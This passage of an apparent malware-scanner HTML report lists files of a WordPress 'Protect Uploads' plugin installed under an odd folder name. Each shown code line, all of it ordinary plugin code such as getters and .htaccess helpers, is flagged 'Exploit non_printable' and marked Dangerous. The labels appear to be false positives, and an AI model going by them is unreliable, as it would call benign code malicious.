<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$component</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">= </span><span style="color: #0000BB">10</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">= </span><span style="color: #0000BB">1 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$component</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">= </span><span style="color: #0000BB">10</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">= </span><span style="color: #0000BB">1 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that is used to register the actions </span><span style="color: #007700">and </span><span style="color: #0000BB">hooks into a single</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 68</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">type The collection of actions </span><span style="color: #007700">and </span><span style="color: #0000BB">filters registered with WordPress</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 70</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add</span><span style="color: #007700">( </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">, </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$component</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 80</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to execute the </span><span style="color: #007700">list </span><span style="color: #0000BB">of actions </span><span style="color: #007700">and </span><span style="color: #0000BB">filters</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_236").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/eiaxb/includes/class-protect-uploads-deactivator.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 313.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_237" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { </span><span style="color: #0000BB">$plugin </span><span style="color: #007700">= new </span><span style="color: #0000BB">Alti_ProtectUploads_Admin</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">version</span><span style="color: #007700">); </span><span style="color: #0000BB">$plugin</span><span style="color: #007700">-></span><span style="color: #0000BB">remove_index</span><span style="color: #007700">(); </span><span style="color: #0000BB">$plugin</span><span style="color: #007700">-></span><span style="color: #0000BB">remove_htaccess</span><span style="color: #007700">(); </span><span style="color: #0000BB">delete_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">().</span><span style="color: #DD0000">'-protection' </span><span style="color: #007700">); } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_237").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/eiaxb/includes/class-protect-uploads-activator.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 112.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_238" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_238").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/eiaxb/includes/class-protect-uploads.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.75 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 12</span><br><table id="file_239" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">loader</span><span style="color: #007700">-></span><span style="color: #0000BB">run</span><span style="color: #007700">(); } public function </span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">() { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">get_loader</span><span style="color: #007700">() { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">loader</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">get_version</span><span style="color: #007700">() { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">version</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_dependencies</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_locale</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">define_admin_hooks</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 54</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 61</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 64</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_loader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">loader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 69</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_version</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">version</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_239").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/eiaxb/protect-uploads.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.51 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_240" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">deactivate_alti_protect_uploads</span><span style="color: #007700">() { require_once </span><span style="color: #0000BB">plugin_dir_path</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">) . </span><span style="color: #DD0000">'admin/class-protect-uploads-admin.php'</span><span style="color: #007700">; require_once </span><span style="color: #0000BB">plugin_dir_path</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">) . </span><span style="color: #DD0000">'includes/class-protect-uploads-deactivator.php'</span><span style="color: #007700">; </span><span style="color: #0000BB">$deactivation </span><span style="color: #007700">= new </span><span style="color: #0000BB">Alti_ProtectUploads_Deact</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">activate_alti_protect_uploads</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">deactivate_alti_protect_uploads</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_240").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/eiaxb/admin/class-protect-uploads-admin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 9.85 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 40</span><br><table id="file_241" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">display_messages</span><span style="color: #007700">() { foreach (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">messages </span><span style="color: #007700">as </span><span style="color: #0000BB">$name </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messages</span><span style="color: #007700">) { foreach (</span><span style="color: #0000BB">$messages </span><span style="color: #007700">as </span><span style="color: #0000BB">$message</span><span style="color: #007700">) { return </span><span style="color: #DD0000">'<div id="message" class="' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'type'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'"><p>' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'</p></div>'</span><span style="color: #007700">; } } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$plugin_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$version</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 120</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">create_htaccess</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 150</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_index</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_htaccess</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 183</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_protective_files_array</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$response</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_protective_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 198</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 200</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 204</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_root_response_code</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 215</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_htaccess_content</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 217</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">file_get_contents</span><span style="color: #007700">(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">get_uploads_dir</span><span style="color: #007700">() . </span><span style="color: #DD0000">'/.htaccess'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_submenu_page</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_htaccess_is_self_generated</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 230</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_uploads_is_protected</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_protective_file_removable</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 266</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_protection_message_array</span><span style="color: #007700">()</span>
</span>
